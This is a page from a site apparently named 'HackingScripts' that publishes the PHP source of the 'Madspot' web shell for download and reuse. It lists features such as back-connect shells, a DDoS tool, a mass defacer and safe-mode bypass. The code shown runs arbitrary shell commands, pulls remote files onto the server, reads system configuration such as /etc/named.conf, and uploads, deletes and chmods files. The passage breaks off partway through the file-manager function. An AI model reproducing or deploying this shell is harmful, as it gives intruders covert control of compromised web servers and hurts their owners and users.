HackingScripts

Hack Scripts for everybody

Madspot shell script

31 Mar 2014

Madspot shell script. From the Madspot Security Team (madspot.net), or was the author Ikram Ali, as the script says?. You can find the Madspot Security Team website at pcbots.org.

The Madspot shell is written in PHP, runs on both Linux and Windows servers, and provides the following features:

  • Process List
  • Eval
  • SQL Command Panel
  • Hash Genration
  • Perl and PHP Back Connect
  • Zone-h mass defacer
  • Powerful DDOS tool from server
  • Auto Safe mode Off (priv8)
  • Whole Server Auto Symlink (Priva8 Coded)
  • Perl 500 Internal Error Bypass
  • Killcode (Delete Shell)

Madspot shell source code

   1 <?php
   2 
   3     /**
   4      * @author Ikram ALI
   5      * @copyright 2012
   6      */
   7     @define('VERSION','1.0');
   8     @error_reporting(E_ALL ^ E_NOTICE);
   9     @session_start();
  10     @ini_set('error_log',NULL);
  11     @ini_set('log_errors',0);
  12     @ini_set('max_execution_time',0);
  13     @set_time_limit(0);
  14     @set_magic_quotes_runtime(0);
  15 
  16     if(get_magic_quotes_gpc()) {
  17             function madstripslashes($array) {
  18                     return is_array($array) ? array_map('madstripslashes', $array) : stripslashes($array);
  19             }
  20             $_POST = madstripslashes($_POST);
  21     }
  22     $default_action = 'FilesMan';
  23     $default_use_ajax = true;
  24     $default_charset = 'Windows-1251';
  25     if (strtolower(substr(PHP_OS,0,3))=="win")
  26         $sys='win';
  27      else
  28         $sys='unix';
  29 
  30     $home_cwd = @getcwd();
  31     if(isset($_POST['c']))
  32             @chdir($_POST['c']);  
  33 
  34     $cwd = @getcwd();
  35     if($sys == 'win')
  36     {
  37         $home_cwd = str_replace("\\", "/", $home_cwd);
  38             $cwd = str_replace("\\", "/", $cwd);
  39     }
  40 
  41     if($cwd[strlen($cwd)-1] != '/' )
  42             $cwd .= '/';
  43 
  44 
  45     function madEx($in) {
  46             $out = '';
  47             if (function_exists('exec')) {
  48                     @exec($in,$out);
  49                     $out = @join("\n",$out);
  50             } elseif (function_exists('passthru')) {
  51                     ob_start();
  52                     @passthru($in);
  53                     $out = ob_get_clean();
  54             } elseif (function_exists('system')) {
  55                     ob_start();
  56                     @system($in);
  57                     $out = ob_get_clean();
  58             } elseif (function_exists('shell_exec')) {
  59                     $out = shell_exec($in);
  60             } elseif (is_resource($f = @popen($in,"r"))) {
  61                     $out = "";
  62                     while(!@feof($f))
  63                             $out .= fread($f,1024);
  64                     pclose($f);
  65             }
  66             return $out;
  67     }
  68     $down=@getcwd();
  69     if($sys=="win")
  70     $down.='\\';
  71     else
  72     $down.='/';
  73     if(isset($_POST['rtdown']))
  74     {
  75     $url = $_POST['rtdown'];
  76     $newfname = $down. basename($url);
  77     $file = fopen ($url, "rb");
  78     if ($file) {
  79       $newf = fopen ($newfname, "wb");
  80       if ($newf)
  81       while(!feof($file)) {
  82         fwrite($newf, fread($file, 1024 * 8 ), 1024 * 8 );
  83       }
  84       }
  85 
  86     if ($file) {
  87       fclose($file);
  88     }
  89     if ($newf) {
  90       fclose($newf);
  91     }
  92     }
  93 
  94 
  95 
  96      function madhead()
  97      {
  98         if(empty($_POST['charset']))
  99                     $_POST['charset'] = $GLOBALS['default_charset'];
 100 
 101     $freeSpace = @diskfreespace($GLOBALS['cwd']);
 102     $totalSpace = @disk_total_space($GLOBALS['cwd']);
 103     $totalSpace = $totalSpace?$totalSpace:1;
 104 
 105     $on="<font color=#0F0> ON </font>";
 106     $of="<font color=red> OFF </font>";
 107     $none="<font color=#0F0> NONE </font>";  
 108     if(function_exists('curl_version'))
 109         $curl=$on;
 110     else
 111         $curl=$of;
 112     if(function_exists('mysql_get_client_info'))
 113         $mysql=$on;
 114      else
 115         $mysql=$of;
 116     if(function_exists('mssql_connect'))
 117         $mssql=$on;
 118     else
 119        $mssql=$of;
 120 
 121     if(function_exists('pg_connect'))
 122         $pg=$on;
 123     else
 124        $pg=$of;
 125     if(function_exists('oci_connect'))
 126        $or=$on;
 127     else
 128        $or=$of;
 129     if(@ini_get('disable_functions'))
 130       $disfun=@ini_get('disable_functions');
 131     else
 132     $disfun="All Functions Enable";
 133     if(@ini_get('safe_mode'))
 134     $safe_modes="<font color=red>ON</font>";
 135     else
 136     $safe_modes="<font color=#0F0 >OFF</font>";
 137     if(@ini_get('open_basedir'))
 138     $open_b=@ini_get('open_basedir');
 139         else
 140       $open_b=$none;
 141 
 142 
 143     if(@ini_get('safe_mode_exec_dir'))
 144     $safe_exe=@ini_get('safe_mode_exec_dir');
 145         else
 146     $safe_exe=$none;
 147     if(@ini_get('safe_mode_include_dir'))
 148        $safe_include=@ini_get('safe_mode_include_dir');
 149     else
 150      $safe_include=$none;
 151     if(!function_exists('posix_getegid'))
 152     {
 153                     $user = @get_current_user();
 154                     $uid = @getmyuid();
 155                     $gid = @getmygid();
 156                     $group = "?";
 157     } else
 158     {
 159                     $uid = @posix_getpwuid(posix_geteuid());
 160                     $gid = @posix_getgrgid(posix_getegid());
 161                     $user = $uid['name'];
 162                     $uid = $uid['uid'];
 163                     $group = $gid['name'];
 164                     $gid = $gid['gid'];
 165             }
 166 
 167 
 168          $cwd_links = '';
 169             $path = explode("/", $GLOBALS['cwd']);
 170             $n=count($path);
 171             for($i=0; $i<$n-1; $i++) {
 172                     $cwd_links .= "<a  href='#' onclick='g(\"FilesMan\",\"";
 173                     for($j=0; $j<=$i; $j++)
 174                             $cwd_links .= $path[$j].'/';
 175                     $cwd_links .= "\")'>".$path[$i]."/</a>";
 176             }
 177 
 178     $drives = "";
 179     foreach(range('c','z') as $drive)
 180     if(is_dir($drive.':\\'))
 181     $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
 182 
 183 
 184 
 185 
 186 
 187      echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 188     <html xmlns="http://www.w3.org/1999/xhtml">
 189     <head>
 190     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 191     <link href="http://www.madspot.net/favicon.ico" rel="icon" type="image/x-icon"/>
 192     <title>Madspot Security Team Shell</title>
 193     <style type="text/css">
 194     <!--
 195     .whole {
 196             background-color: #CCC;
 197             height:auto;
 198             width: auto;
 199             margin-top: 10px;
 200             margin-right: 10px;
 201             margin-left: 10px;
 202     }
 203     .header {
 204             height: auto;
 205             width: auto;
 206             border: 7px solid #CCC;
 207             color: #999;
 208             font-size: 12px;
 209             font-family: Verdana, Geneva, sans-serif;
 210             background-color: #000;
 211     }
 212     .header a {color:#0F0; text-decoration:none;}
 213     span {
 214             font-weight: bolder;
 215             color: #FFF;
 216     }
 217     #meunlist {
 218             font-family: Verdana, Geneva, sans-serif;
 219             color: #FFF;
 220             background-color: #000;
 221             width: auto;
 222             border-right-width: 7px;
 223             border-left-width: 7px;
 224             border-top-style: solid;
 225             border-right-style: solid;
 226             border-bottom-style: solid;
 227             border-left-style: solid;
 228             border-top-color: #CCC;
 229             border-right-color: #CCC;
 230             border-bottom-color: #CCC;
 231             border-left-color: #CCC;
 232             height: auto;
 233             font-size: 12px;
 234             font-weight: bold;
 235             border-top-width: 0px;
 236     }
 237      .whole #meunlist ul {
 238             padding-top: 5px;
 239             padding-right: 5px;
 240             padding-bottom: 7px;
 241             padding-left: 2px;
 242             text-align:center;
 243             list-style-type: none;
 244             margin: 0px;
 245     }
 246      .whole #meunlist li {
 247             margin: 0px;
 248             padding: 0px;
 249             display: inline;
 250     }
 251      .whole #meunlist a {
 252        font-family: arial, sans-serif;
 253             font-size: 14px;
 254             text-decoration:none;
 255             font-weight: bold;
 256             color: #fff;
 257             clear: both;
 258             width: 100px;
 259             margin-right: -6px;
 260             padding-top: 3px;
 261             padding-right: 15px;
 262             padding-bottom: 3px;
 263             padding-left: 15px;
 264             border-right-width: 1px;
 265             border-right-style: solid;
 266             border-right-color: #FFF;
 267     }
 268      .whole #meunlist a:hover {
 269             color: #000;
 270             background: #fff;
 271     }
 272 
 273     .foot {
 274             font-family: Verdana, Geneva, sans-serif;
 275             background-color: #000;
 276             margin: 0px;
 277             padding: 0px;
 278             width: 100%;
 279             text-align: center;
 280             font-size: 12px;
 281             color: #CCC;
 282             border-right-width: 7px;
 283             border-left-width: 7px;
 284        border-bottom-width: 7px;
 285        border-bottom-style: solid;
 286        border-right-style: solid;
 287        border-right-style: solid;
 288             border-left-style: solid;
 289             border-top-color: #CCC;
 290             border-right-color: #CCC;
 291             border-bottom-color: #CCC;
 292             border-left-color: #CCC;
 293     }';
 294     if(is_writable($GLOBALS['cwd']))
 295      {
 296         echo ".foottable {
 297        width: 300px;
 298        font-weight: bold;
 299        }";}
 300         else
 301         {
 302            echo ".foottable {
 303        width: 300px;
 304        font-weight: bold;
 305        background-color:red;
 306        }
 307        .dir {
 308          background-color:red;  
 309        }
 310        ";
 311         }
 312      echo '.main th{text-align:left;}
 313     .main a{color: #FFF;}
 314     .main tr:hover{background-color:red;}
 315     .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
 316     .bigarea{ width:99%; height:300px; }  
 317      </style>
 318 
 319     ';
 320 
 321     echo "<script>
 322        var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
 323        var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
 324        var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
 325        var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
 326        var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
 327        var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
 328        var d = document;
 329             function set(a,c,p1,p2,p3,charset) {
 330                     if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
 331                     if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
 332                     if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
 333                     if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
 334                     if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
 335                     if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
 336             }
 337             function g(a,c,p1,p2,p3,charset) {
 338                     set(a,c,p1,p2,p3,charset);
 339                     d.mf.submit();
 340             }</script>";
 341 
 342 
 343             echo '
 344     </head>
 345 
 346     <body bgcolor="#000000"  leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
 347     <div class="whole">
 348     <form method=post name=mf style="display:none;">
 349     <input type=hidden name=a>
 350     <input type=hidden name=c>
 351     <input type=hidden name=p1>
 352     <input type=hidden name=p2>
 353     <input type=hidden name=p3>
 354     <input type=hidden name=charset>
 355     </form>
 356      <div class="header"><table width="100%" border="0"  align="lift">
 357      <tr>
 358        <td width="3%"><span>Uname:</span></td>
 359        <td colspan="2">'.substr(@php_uname(), 0, 120).'</td>
 360        </tr>
 361      <tr>
 362        <td><span>User:</span></td>
 363        <td>'. $uid . ' [ ' . $user . ' ] <span>   Group: </span>' . $gid . ' [ ' . $group . ' ] </td>
 364        <td width="14%" rowspan="8"><img alt="" src="data:image/jpeg;base64,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" /></td>
 365      </tr>
 366      <tr>
 367        <td><span>PHP:</span></td>
 368        <td>'.@phpversion(). '   <span>   Safe Mode:'.$safe_modes.'</span></td>
 369        </tr>
 370      <tr>
 371        <td><span>Our IP:</span></td>
 372        <td>'.@$_SERVER["SERVER_ADDR"].'    <span>Server IP:</span> '.@$_SERVER["REMOTE_ADDR"].'</td>
 373      </tr>
 374      <tr>
 375        <td><span>WEBS:</span></td>
 376        <td width="76%">';
 377 
 378         if($GLOBALS['sys']=='unix')
 379         {
 380             $d0mains = @file("/etc/named.conf");
 381             if(!$d0mains)
 382             {
 383                 echo "CANT READ named.conf";
 384             }
 385             else
 386             {
 387               $count;  
 388              foreach($d0mains as $d0main)
 389              {
 390               if(@ereg("zone",$d0main))
 391               {
 392               preg_match_all('#zone "(.*)"#', $d0main, $domains);
 393                flush();
 394               if(strlen(trim($domains[1][0])) > 2){
 395              flush();
 396              $count++;
 397                }
 398                }
 399                }
 400                echo "$count  Domains";
 401             }
 402         }
 403         else{ echo"CANT READ |Windows|";}
 404 
 405           echo '</td>
 406        </tr>
 407        <tr>
 408        <td height="16"><span>HDD:</span></td>
 409        <td>'.madSize($totalSpace).' <span>Free:</span>' . madSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</td>
 410        </tr>';
 411 
 412          if($GLOBALS['sys']=='unix' )
 413     {
 414         if(!@ini_get('safe_mode'))
 415         {
 416 
 417         echo '<tr><td height="18" colspan="2"><span>Useful : </span>';
 418         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
 419          foreach($userful as $item)
 420              if(madWhich($item))
 421              echo $item.',';
 422              echo '</td>
 423             </tr>
 424              <tr>
 425              <td height="0" colspan="2"><span>Downloader:</span>';
 426 
 427          $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
 428           foreach($downloaders as $item2)
 429            if(madWhich($item2))
 430             echo $item2.',';
 431             echo '</td>
 432                  </tr>';
 433 
 434               }
 435                else
 436                {
 437              echo '<tr><td height="18" colspan="2"><span>useful:</span>';
 438              echo '--------------</td>
 439               </tr><td height="0" colspan="2"><span>Downloader: </span>-------------</td>
 440                  </tr>';  
 441              }
 442     }
 443     else
 444     {
 445        echo '<tr><td height="18" colspan="2"><span>Window:</span>';
 446        echo madEx('ver');
 447        echo '</td>
 448             </tr> <tr>
 449            <td height="0" colspan="2"><span>Downloader: </span>-------------</td>
 450                  </tr>';
 451 
 452     }  
 453 
 454 
 455      echo '<tr>
 456        <td height="16" colspan="2"><span>Disabled functions:</span>'.$disfun.'</td>
 457      </tr>
 458      <tr>
 459        <td height="16" colspan="2"><span>cURL:'.$curl.'  MySQL:'.$mysql.'  MSSQL:'.$mssql.'  PostgreSQL:'.$pg.'  Oracle: </span>'.$or.'</td><td width="15%">'.base64_decode("PGEgaHJlZj0iaHR0cDovL3d3dy5tYWRzcG90Lm5ldCIgdGFyZ2V0PSJfYmxhbmsiPjxzcGFuPjxmb250IGNvbG9yPSIjMEYwIj4mbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDtNQURTUE9ULk5FVDwvZm9udD48L3NwYW4+PC9hPg==").'</td>
 460      </tr>
 461      <tr>
 462      <td height="11" colspan="3"><span>Open_basedir:'.$open_b.' Safe_mode_exec_dir:'.$safe_exe.'   Safe_mode_include_dir:'.$safe_include.'</td>
 463      </tr>
 464      <tr>
 465        <td height="11"><span>Server </span></td>
 466        <td colspan="2">'.@getenv('SERVER_SOFTWARE').'</td>
 467      </tr>';
 468       if($GLOBALS[sys]=="win")
 469       {
 470         echo '<tr>
 471        <td height="12"><span>DRIVE:</span></td>
 472        <td colspan="2">'.$drives.'</td>
 473         </tr>';
 474       }
 475 
 476       echo '<tr>
 477        <td height="12"><span>PWD:</span></td>
 478        <td colspan="2">'.$cwd_links.'  <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><font color=red >|CURRENT|</font></a></td>
 479      </tr>
 480      </table>
 481     </div>
 482     <div id="meunlist">
 483          <ul>
 484     <li><a href="#" onclick="g(\'FilesMan\',null,\'\',\'\',\'\')">HOME</a></li>
 485 
 486     <li><a href="#" onclick="g(\'proc\',null,\'\',\'\',\'\')">PROCESS</a></li>
 487     <li><a href="#" onclick="g(\'phpeval\',null,\'\',\'\',\'\')">EVAL</a></li>
 488     <li><a href="#" onclick="g(\'sql\',null,\'\',\'\',\'\')">SQL</a></li>
 489     <li><a href="#" onclick="g(\'hash\',null,\'\',\'\',\'\')">HASH</a></li>
 490     <li><a href="#" onclick="g(\'connect\',null,\'\',\'\',\'\')">CONNECT</a></li>
 491     <li><a href="#" onclick="g(\'zoneh\',null,\'\',\'\',\'\')">ZONE-H</a></li>
 492     <li><a href="#" onclick="g(\'dos\',null,\'\',\'\',\'\')">DDOS</a></li>
 493     <li><a href="#" onclick="g(\'safe\',null,\'\',\'\',\'\')">SAFE MODE</a></li>
 494     <li><a href="#" onclick="g(\'symlink\',null,\'\',\'\',\'\')">SYMLINK</a></li>
 495     <li><a href="#" onclick="g(\'spot\',null,\'\',\'\',\'\')">MADSPOT</a></li>
 496     <li><a href="#" onclick="g(\'selfrm\',null,\'\',\'\',\'\')">KIll C0de</a></li>
 497     </ul>
 498 
 499        </div>
 500     ';  
 501 
 502     }
 503 
 504     function madfooter()
 505     {
 506 
 507         echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
 508           <tr>
 509             <td width='17%'><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>__MK FILE__</span><br><input class='dir'  type=text name=f value=''><input type=submit value='>>'></form></td>
 510             <td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>__MK DIR__</span><br><input class='dir' type=text name=d value=''><input type=submit value='>>'></form></td>
 511             <td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);return false;\"><span>__DELETE__</span><br><input class='dir' type=text name=del value=''><input type=submit value='>>'></form></td>
 512             <td width='19%'><form onsubmit=\"g('FilesTools',null,this.f.value,'chmod');return false;\"><span>__CHMOD__</span><br><input class='dir' type=text name=f value=''><input type=submit value='>>'></form></td>
 513           </tr>
 514           <tr>
 515             <td colspan='2'><form onsubmit='g(null,this.c.value,\"\");return false;'><span>__CHANGE DIR__</span><br><input class='foottable' type=text name=c value='".htmlspecialchars($GLOBALS['cwd'])."'><input type=submit value='>>'></form></td>
 516             <td colspan='2'><form method='post' ><span>__HTTP DOWNLOAD__</span><br><input class='foottable' type=text name=rtdown value=''><input type=submit value='>>'></form></td>
 517            </tr>
 518           <tr>
 519             <td colspan='4'><form onsubmit=\"g('proc',null,this.c.value);return false;\"><span>__EXECUTE__</span><br><input class='foottable' type=text name=c value=''><input type=submit value='>>'></form></td>
 520            </tr>
 521           <tr>
 522             <td colspan='4'><form method='post' ENCTYPE='multipart/form-data'>
 523                     <input type=hidden name=a value='FilesMAn'>
 524                     <input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
 525                     <input type=hidden name=p1 value='uploadFile'>
 526                     <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
 527            <span>Upload file:</span><br><input class='toolsInp' type=file name=f><br /><input type=submit value='>>'></form></td>
 528            </tr>
 529          </table>
 530      </div>
 531      </body>
 532     </html>
 533     ";
 534 
 535     }
 536     if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {
 537        function posix_getpwuid($p) {return false;} }
 538     if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {
 539       function posix_getgrgid($p) {return false;} }
 540 
 541     function madWhich($p) {
 542             $path = madEx('which ' . $p);
 543             if(!empty($path))
 544                     return $path;
 545             return false;
 546     }
 547 
 548 
 549 
 550     function madSize($s) {
 551             if($s >= 1073741824)
 552                     return sprintf('%1.2f', $s / 1073741824 ). ' GB';
 553             elseif($s >= 1048576)
 554                     return sprintf('%1.2f', $s / 1048576 ) . ' MB';
 555             elseif($s >= 1024)
 556                     return sprintf('%1.2f', $s / 1024 ) . ' KB';
 557             else
 558                     return $s . ' B';
 559     }
 560 
 561 
 562     function madPerms($p) {
 563             if (($p & 0xC000) == 0xC000)$i = 's';
 564             elseif (($p & 0xA000) == 0xA000)$i = 'l';
 565             elseif (($p & 0x8000) == 0x8000)$i = '-';
 566             elseif (($p & 0x6000) == 0x6000)$i = 'b';
 567             elseif (($p & 0x4000) == 0x4000)$i = 'd';
 568             elseif (($p & 0x2000) == 0x2000)$i = 'c';
 569             elseif (($p & 0x1000) == 0x1000)$i = 'p';
 570             else $i = 'u';
 571             $i .= (($p & 0x0100) ? 'r' : '-');
 572             $i .= (($p & 0x0080) ? 'w' : '-');
 573             $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
 574             $i .= (($p & 0x0020) ? 'r' : '-');
 575             $i .= (($p & 0x0010) ? 'w' : '-');
 576             $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
 577             $i .= (($p & 0x0004) ? 'r' : '-');
 578             $i .= (($p & 0x0002) ? 'w' : '-');
 579             $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
 580             return $i;
 581     }
 582     function madPermsColor($f) {
 583             if (!@is_readable($f))
 584                     return '<font color=#FF0000>' . madPerms(@fileperms($f)) . '</font>';
 585             elseif (!@is_writable($f))
 586                     return '<font color=white>' . madPerms(@fileperms($f)) . '</font>';
 587             else
 588                     return '<font color=#25ff00>' . madPerms(@fileperms($f)) . '</font>';
 589     }
 590 
 591     if(!function_exists("scandir")) {
 592             function scandir($dir) {
 593                     $dh  = opendir($dir);
 594                     while (false !== ($filename = readdir($dh)))
 595                     $files[] = $filename;
 596                     return $files;
 597             }
 598     }
 599 
 600 
 601     function madFilesMan() {
 602             madhead();
 603         echo '<div class=header><script>p1_=p2_=p3_="";</script>';
 604             if(!empty($_POST['p1'])) {
 605                     switch($_POST['p1']) {
 606                             case 'uploadFile':
